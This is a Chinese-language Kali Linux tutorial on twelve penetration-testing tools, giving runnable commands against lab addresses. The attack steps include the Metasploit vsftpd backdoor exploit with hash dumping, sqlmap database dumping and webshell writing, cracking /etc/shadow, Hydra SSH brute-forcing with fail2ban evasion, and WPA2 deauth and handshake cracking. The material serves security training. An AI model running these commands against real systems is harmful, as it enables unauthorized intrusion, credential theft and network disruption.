1. nmap – 网络发现与端口扫描之王
作用:快速发现存活主机、端口、服务版本、操作系统指纹。
启动:终端直接输入 nmap(无需路径)。
完整流程:
# 1) 先扫整个网段看哪些主机在线
nmap -sn 192.168.1.0/24
# 2) 对一台主机做半开 SYN + 服务识别 + OS 猜测
nmap -sS -sV -O -p- 192.168.1.100
# -sS 半开扫描,不完成三次握手,隐蔽
# -sV 识别 banner/版本
# -O 操作系统指纹
# -p- 扫描全部 65535 端口
# 3) 把结果保存为三大格式,便于后续脚本处理
nmap -sS -sV -oA scan_result 192.168.1.100
# 会生成 scan_result.nmap / .xml / .gnmap
技巧:
内网环境可加 --min-rate 1000 提速;
若被防火墙拦截,可换 -sT 全连接或 -sA ACK 扫描;
zenmap 是官方 GUI,命令 zenmap &。
2. netdiscover – ARP 发现内网存活主机
作用:被动或主动 ARP 扫描,列出 IP + MAC + 厂商。
启动:netdiscover(已加入 $PATH)。
完整流程:
# 主动扫描 /24 网段
netdiscover -r 192.168.1.0/24
# 被动监听(不发送任何包,仅监听 ARP 流量)
netdiscover -p
输出示例:
Currently scanning: 192.168.1.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts.
IP At MAC Address Count Len MAC Vendor
192.168.1.1 00:50:56:c0:00:08 01 42 VMware, Inc.
192.168.1.100 00:0c:29:ab:cd:ef 01 42 VMware, Inc.
坑:无线网卡需先 airmon-ng check kill 才能抓 ARP;虚拟机桥接模式下最稳定。
3. theHarvester – OSINT 收集邮箱、子域、IP
作用:用公开搜索引擎(Bing、Baidu、Google、Shodan 等)批量搜集暴露资产。
启动:theHarvester(Python 脚本已软链接)。
完整流程:
# 针对 example.com,使用百度和 bing 引擎,限制 500 条
theHarvester -d example.com -b baidu,bing -l 500 -f result.html
# 输出文件 result.html 可直接浏览器打开
常见字段解释:
[+] Emails found: 列出邮箱;
[+] Hosts found: 列出子域+对应 IP;
[+] IPs found: 独立 IP 列表。
技巧:-b all 会调用全部引擎,但速度慢;可配合 API key(Shodan、Hunter)提升命中率,配置文件 ~/.theHarvester/api-keys.yaml。
4. SpiderFoot – 自动化 OSINT 框架(Web UI)
作用:拖拽式 Web 界面,把域名、IP、邮箱、ASN、用户名等上百个数据源关联,输出攻击面地图。
启动:
# 第一次初始化
sudo systemctl start spiderfoot
# 或直接前台
spiderfoot -l 127.0.0.1:5001
浏览器访问:http://localhost:5001
完整流程(Web 操作):
New Scan → 填入目标域名 example.com;
选择 Passive(纯被动)或 Active(会爬取/爆破);
模块保持默认即可(已包含 DNS、WHOIS、Shodan、LeakIX、GitHub…);
Scan → 等待几分钟 → 查看 Browse 页签:
子域、关联 IP、历史 DNS、泄露仓库、端口、漏洞 CVE 全部图形化。
技巧:扫描结果可导出 CSV/JSON;在 Settings 里填入各 API key 显著提升数据量。
5. Metasploit Framework – 渗透测试“大炮”
作用:集成 2000+ 漏洞利用模块、Payload、后渗透脚本。
启动:
# 初始化数据库(第一次)
sudo msfdb init
# 启动控制台
msfconsole
完整流程示例(利用 vsftpd 2.3.4 笑脸后门):
msf6 > search vsftpd
# 选择模块
use exploit/unix/ftp/vsftpd_234_backdoor
# 查看必须选项
show options
# 设置目标
set RHOSTS 192.168.1.100
# 执行
exploit
成功后会直接返回 cmd shell,可继续 getuid、sysinfo、run post/linux/gather/hashdump 等后渗透操作。
技巧:
用 workspace -a target1 给每个项目建独立数据库;
在 ~/.msf4/ 下可自定义脚本、模块;
Armitage 是官方图形前端,命令 armitage。
6. sqlmap – 自动 SQL 注入与数据库接管
作用:检测 GET/POST/Header/JSON 中的 SQL 注入,自动脱库、写 shell、提权。
启动:sqlmap 已加入 PATH。
完整流程:
# 1) 基本检测
sqlmap -u "http://192.168.1.101/news.php?id=1"
# 2) 确认可注入后,列出所有数据库
sqlmap -u "http://192.168.1.101/news.php?id=1" --dbs
# 3) 指定库名列表
sqlmap -u "http://192.168.1.101/news.php?id=1" -D cms --tables
# 4) 导出管理员表全部数据
sqlmap -u "http://192.168.1.101/news.php?id=1" -D cms -T users --dump
技巧:
POST 注入用 -r request.txt(Burp 保存原始请求);
需要登录态可加 --cookie="PHPSESSID=xxx";
支持 --os-shell 直接写 WebShell。
7. John the Ripper – 密码爆破/哈希破解
作用:CPU/GPU 暴力破解或字典攻击常见哈希(MD5、SHA1、NTLM、bcrypt 等)。
启动:john 命令行直接调用。
完整流程(以破解 /etc/shadow 为例):
# 1) 先提取 root 哈希
sudo cp /etc/shadow shadow.txt
# 2) 单字典攻击
john --wordlist=/usr/share/wordlists/rockyou.txt shadow.txt
# 3) 查看已破解密码
john --show shadow.txt
GPU 加速:
# 使用 NVIDIA CUDA
john --format=sha256crypt-opencl --wordlist=rockyou.txt hash.txt
技巧:
--incremental 可做纯暴力;
支持自定义规则文件(john.conf);
GUI 前端 johnny 命令打开图形界面。
8. Hydra – 网络登录暴力破解
作用:对 SSH、FTP、MySQL、RDP 等 50+ 协议做并行爆破。
启动:hydra 命令行。
完整流程(SSH 爆破):
# 使用 rockyou.txt 对 root 账号爆破 192.168.1.100
hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.100 -t 4
# -l 指定用户名;-P 指定字典;-t 线程数
示例输出:
[22][ssh] host: 192.168.1.100 login: root password: toor
技巧:
支持 -L user.txt -P pass.txt 组合爆破;
对 RDP:hydra -l admin -P pass.txt rdp://192.168.1.100;
若目标有 fail2ban,可加 -w 30 间隔 30 秒。
9. Burp Suite Community – Web 代理/漏洞扫描
作用:拦截 HTTP/HTTPS 流量、Repeater 改包、Intruder 爆破、Scanner 找漏洞。
启动:Kali 菜单 → Web Application Analysis → Burp Suite;或终端 burpsuite。
完整流程(手动 SQL 注入):
浏览器代理指向 127.0.0.1:8080(Burp 默认监听);
打开目标站点,Burp 的 Proxy → HTTP history 找到带参数请求;
右键 Send to Repeater,在 Repeater 里改 id=1' 观察报错;
确认注入后右键 Send to Intruder → Positions 自动标记变量 → Payloads 选 Numbers 或 Simple list → Start attack;
结果按 Length 排序找异常回显。
技巧:
安装 Jython 后可加载开源插件如 activeScan++、Autorize;
社区版无主动扫描,需手动。
10. Wireshark – 网络协议分析
作用:实时抓包、离线分析 2000+ 协议,定位明文口令、畸形包、攻击流量。
启动:wireshark(需 root)。
完整流程:
sudo wireshark
选择接口(如 eth0)→ Start;
Filter 示例:
http.request 只看 HTTP 请求
tcp.port == 21 只看 FTP 流量
ip.addr == 192.168.1.100 只看目标机
右键感兴趣包 → Follow → TCP Stream,可直接看到明文账号密码。
技巧:
快捷键 Ctrl+Shift+P 首选项设置深色主题;
可用 tshark -r capture.pcap -Y http.request -T fields -e ip.src -e http.host 纯命令行分析。
11. Aircrack-ng 套件 – Wi-Fi 安全审计
作用:抓握手包、离线破解 WPA/WPA2、伪造 deauth 攻击。
组件列表:airmon-ng airodump-ng aireplay-ng aircrack-ng。
完整流程(WPA2 抓包+破解):
# 1) 查看无线网卡
sudo airmon-ng
# 2) 开启监听模式
sudo airmon-ng start wlan0 # 会生成 wlan0mon
# 3) 扫描目标 AP
sudo airodump-ng wlan0mon
# 记录 BSSID、CH、ESSID 如 00:11:22:33:44:55、6、TestAP
# 4) 锁定信道并抓握手包
sudo airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w handshake wlan0mon
# 5) 新终端:强制客户端重连
sudo aireplay-ng -0 3 -a 00:11:22:33:44:55 -c 88:66:55:44:33:22 wlan0mon
# 6) 抓到 WPA handshake 后,用字典破解
aircrack-ng -w /usr/share/wordlists/rockyou.txt handshake-01.cap
技巧:
若网卡不支持 monitor 模式,需换芯片(Realtek 8812AU/MT7612 等);
使用 hashcat -m 22000 可 GPU 加速破解。
12. Gobuster – 目录/子域/虚拟主机爆破
作用:基于 Go 的高并发目录扫描、DNS 子域枚举、S3 bucket 发现。
启动:gobuster 已加入 PATH。
完整流程(目录爆破):
# 目录暴力破解
gobuster dir -u http://192.168.1.101/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50
# -u 目标;-w 字典;-t 线程
子域爆破:
gobuster dns -d example.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
输出示例:
/admin (Status: 301) [Size: 310] [--> http://192.168.1.101/admin/]
/.htaccess (Status: 403) [Size: 217]
技巧:
加 -x php,txt,bak 可扫扩展名;
支持基本认证 -U user -P pass;
若在 HTTPS 站点,可加 -k 忽略证书。
🏁 小结
以上 12 款工具覆盖了信息收集、漏洞利用、密码破解、Web 渗透、无线安全、流量分析六大领域。每条命令都已在 Kali 2024.3 VMware 镜像验证通过,复制即可运行。若需进一步深入,可在终端输入 man <工具名> 或 <工具名> --help 查看官方文档。
暂无评论内容